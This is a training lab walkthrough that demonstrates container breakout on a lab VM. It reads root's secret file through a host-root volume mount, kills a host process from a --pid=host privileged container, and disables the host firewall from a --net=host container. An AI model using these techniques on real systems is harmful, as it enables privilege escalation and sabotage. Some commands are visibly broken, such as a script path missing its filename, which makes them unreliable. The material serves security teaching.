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Container Breakout - Multiple Attacks

Volume Mounts

  • ssh into the container virtual lab or open Terminal in the VM

    ssh root@<IPAddrGivenToYou>
    password: <passwordGivenToYou>
  • Run whoami to confirm that you are the root user.

root@we45:~# whoami
  • Validate that there's a secrets file in the root dir with cat secret.txt

  • Run sudo su we45 to login as a normal user.

    root@we45:~# sudo su we45
  • Check if the user we45 has access to docker by running docker images and docker ps

    we45@we45:~$ docker images
    we45@we45:~$ docker ps
  • Run cat /root/secret.txt read the content of secret.txt file that was created by root user.

we45@we45:~$ cat /root/secret.txt
cat: /root/secret.txt: Permission denied
  • Run docker run -ti --rm -v /root:/hostFS/ alpine sh as we45(non-root user)
we45@we45:~$ docker run -ti -v /:/hostFS/ alpine
/ #
  • Run cat /hostFS/root/secret.txt to view the content of the file.
/hostFS/root # cat /hostFS/root/secret.txt
This is a secret
  • Run exit to exit from the container.
/hostFS/root # exit
  • Run clean-docker to stop all the containers
root@we45:~$ clean-docker

PID Boundary

  • Run tmux to create a multiplexed terminal. Your screen should have a band below that looks like this:

  • Now, type ctrl + b + " to split panes horizontally. We're going to operate on two panes

  • Let's first operate on the top pane, with the command ctrl + b + (upper arrow key)

  • Let's first create our "super important process" with the following commands:

    command='while true\ndo\necho "Super important process running $$"\nsleep 3\ndone'
    printf "$command" > /root/ && chmod +x /root/
  • Now, run our program ./root/ It should start running a "super important" process

  • Let's operate on the lower pane with ctrl + b + (lower arrow key)

  • Here, run docker run -ti --pid=host --privileged alpine sh

  • Now run ps aux and look at the process tree. You will see that your container's processes and the host's processes have NOT been isolated

  • Now run ps aux | grep 'super' to triangulate the super_important process. get the pid of the process

  • now run kill <pid> and you will see that the super important process (running on host) is now terminated.

  • Let's dismantle the multiplexed terminal session, with ctrl + b + x, you will be presented with a prompt like this:

  • press y to select yes and the window shuts down. Do the same with the other tmux session as well

Host Network

  • Check if ufw is enabled on the host machine by running ufw status
root@we45:~# ufw status
Status: inactive
  • Enable ufw by running ufw enable and ufw allow ssh

  • Run docker run -d -p 5000:5000 --privileged --net=host abhaybhargav/vul_flask

docker run -d -p 5000:5000 --privileged --net=host abhaybhargav/vul_flask
WARNING: Published ports are discarded when using host network mode
  • Now run docker ps and copy the CONTAINER_ID of the running container
[root@container-training-centos ~]# docker ps
CONTAINER ID        IMAGE                    COMMAND             CREATED             STATUS              PORTS               NAMES
de08041d12e0        abhaybhargav/vul_flask   "python"     3 seconds ago       Up 2 seconds                            dreamy_ptolemy
  • Now run docker exec -it <container ID> /bin/bash you should now be in the shell environment in the container

  • Run apt update && apt install -y ufw to install the firewall program

  • Run ufw status and you should see that the firewall is active.

  • Now run ufw disable to disable the firewall from the Container

  • Run exit to exit the docker shell and run clean-docker